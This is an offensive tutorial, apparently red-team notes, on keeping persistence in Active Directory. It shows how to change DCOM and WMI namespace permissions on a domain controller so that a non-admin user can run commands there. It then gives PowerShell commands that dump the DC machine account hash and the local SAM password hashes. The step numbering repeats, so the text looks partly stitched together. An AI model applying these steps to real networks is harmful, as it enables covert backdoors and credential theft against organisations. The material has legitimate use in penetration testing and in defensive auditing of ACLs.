This is an interesting way to obtain persistence because the ACL's for Remoting Protocols are rarely audited.
You must have Domain Admin privileges to perform these attacks. Modifying these descriptors can give non-admin users access to such things as WMI, Powershell Remoting, and the Remote Registry without having to give him Domain Admin privileges.
Subsequently the non-admin user will then be able to execute commands on the DC despite not being an admin.
Modifying the Descriptors Manually From the DC - Giving a User Full Control Over the WMI Namespace
Step 1 - In Component Services, Change the DCOM Permissions of the Computer
Give the user Remote Access permissions
Then give him all Launch and Activation permissions
Step 2 - Modify the WMI Namespace Settings in Computer Management
Give the user full rights over the root WMI namespace
Then make sure those rights apply to all of the child namespaces as well
Step 3 - Check the Access of the Non-Admin User to the DC
PS C:\Windows\system32> Get-WmiObject -Class win32_operatingsystem -ComputerName dc.domain
SystemDirectory : C:\Windows\system32
Organization :
BuildNumber : 14393
RegisteredUser : Windows User
SerialNumber : 00377-80000-00000-AA805
Version : 10.0.14393
Step 2 - In a New Window as the User, Use RemoteHashRetrieval.ps1
# Get the DC Machine Hash
Get-RemoteMachineAccountHash -ComputerName dcorp-dc -Verbose
# Dump the Local SAM Hashes
Get-RemoteLocalAccountHash -ComputerName dcorp-dc -Verbose